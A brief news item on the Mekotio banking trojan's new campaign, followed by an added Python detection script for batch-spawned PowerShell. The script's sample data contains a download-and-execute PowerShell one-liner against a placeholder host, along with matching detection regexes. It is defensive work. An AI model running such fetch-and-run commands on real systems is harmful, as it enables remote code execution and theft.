The Mekotio banking trojan, which targets Latin America, is back after the arrest of a gang operating in Spain. More than 100 attacks in recent weeks have revealed a new infection process, indicating that the group remains active.
“The new campaign began shortly after the Spanish Civil Guard announced the arrest of 16 people involved in the distribution of Mekotio in July,” according to Check Point Research (CPR). “It appears that the gang that controlled the malware was able to close the gap quickly and change tactics to avoid detection.”
The attacks are multi-stage in every case and begin with spam emails, aimed at stealing sensitive information, that carry either a link to a ZIP archive or a ZIP attachment. As a lure, the email claims to contain a digital tax receipt awaiting delivery.
If the user is tricked into opening the ZIP file, the batch file it contains executes. That batch file then issues a PowerShell command that downloads and runs a PowerShell script in memory.
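As an added example (not from the article, threatpost or CPR), the following Python check applies a defender's rule to process-creation telemetry for the chain described above: a batch file (run by cmd.exe) spawning PowerShell that downloads and executes a script in memory. The event shape, field names and sample lines are constructed assumptions, not real Mekotio artifacts.

```python
import re

# Constructed sample process-creation events in a Sysmon-like shape (assumption:
# real telemetry fields vary by EDR). None of these values are real Mekotio IoCs.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/s.ps1')"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},  # benign admin use
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -EncodedCommand QQBBAEEAQQA="},  # placeholder blob
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ipconfig.exe",
     "cmdline": "ipconfig /all"},
]

# Download primitives and in-memory execution markers commonly seen in such one-liners.
DOWNLOAD = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)
IN_MEMORY = re.compile(r"\biex\b|invoke-expression|-enc(odedcommand)?\b", re.I)

def is_batch_spawned_powershell(ev):
    """cmd.exe (the interpreter for a .bat/.cmd file) launching powershell.exe."""
    return (ev["parent"].lower().endswith("\\cmd.exe")
            and ev["image"].lower().endswith("\\powershell.exe"))

def score_event(ev):
    """Return the reasons this event matches the batch -> PowerShell download-and-run chain."""
    reasons = []
    if not is_batch_spawned_powershell(ev):
        return reasons
    reasons.append("powershell spawned by cmd.exe")
    if DOWNLOAD.search(ev["cmdline"]):
        reasons.append("download primitive in command line")
    if IN_MEMORY.search(ev["cmdline"]):
        reasons.append("in-memory execution (IEX/-EncodedCommand)")
    return reasons

def flag_events(events, min_reasons=2):
    """Ids of events with at least min_reasons matches; parent/child alone is too noisy to alert on."""
    return [ev["id"] for ev in events if len(score_event(ev)) >= min_reasons]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], score_event(ev))
    print("flagged:", flag_events(SAMPLE_EVENTS))  # flagged: [1, 3]
```

Tune the regexes to your own PowerShell baseline; legitimate scripts launched from batch files that also fetch content will trip the download rule and need an allow-list.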
Read More: threatpost